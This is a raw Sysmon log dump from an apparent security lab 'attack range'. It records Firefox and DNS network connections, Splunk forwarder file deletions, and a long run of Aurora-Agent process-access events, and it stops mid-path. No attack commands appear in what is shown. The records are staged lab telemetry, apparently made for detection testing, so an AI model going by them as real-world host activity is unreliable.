12:30:38.489{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;23.33.22.142;23.33.22.139;C:\Program Files\Mozilla Firefox\firefox.exe 354300x800000000000000048450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.488{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56503-false23.33.22.142a23-33-22-142.deploy.static.akamaitechnologies.com80http 354300x800000000000000048449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.477{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58638- 354300x800000000000000048448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.452{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56501-false34.120.115.102102.115.120.34.bc.googleusercontent.com443https 354300x800000000000000048447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.452{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56502-false34.120.115.102102.115.120.34.bc.googleusercontent.com443https 354300x800000000000000048446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.440{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60271- 354300x800000000000000048445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.440{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61623- 23542300x800000000000000048454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:41.975{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A3F6782B79060CE5742CCCBD6131D5C,SHA256=AC3C69DD0C39A186191318F8D997A1AF3AF0B50E00D9E515C186CC5D8AD5376C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018897Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:41.018{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE8F26B475F8E3A54D05E2978DEA1CCF,SHA256=806C173F17D11EACD7C399414F5D39E785A608327ED5A850BA675EEC785F18DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:41.720{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index~RF30d78a.TMPMD5=40692939CBA606407B47A6A7FF1D9468,SHA256=ED34341E725DF28F72F3CD03B378505122B44652094A2F95017E38F16E914197,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018929Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.783{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018928Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.780{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018927Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.778{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018926Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.766{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018925Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018924Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.761{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018923Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.759{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018922Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.755{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018921Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.754{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018920Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.752{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018919Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.751{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018918Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.745{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018917Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.740{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018916Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.738{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018915Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.719{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018914Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.713{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018913Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.699{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018912Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.695{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018911Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.678{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018910Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.672{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018909Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.662{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018908Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.653{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018907Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.643{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018906Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.611{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018905Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.600{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018904Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.592{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018903Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:42.579{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 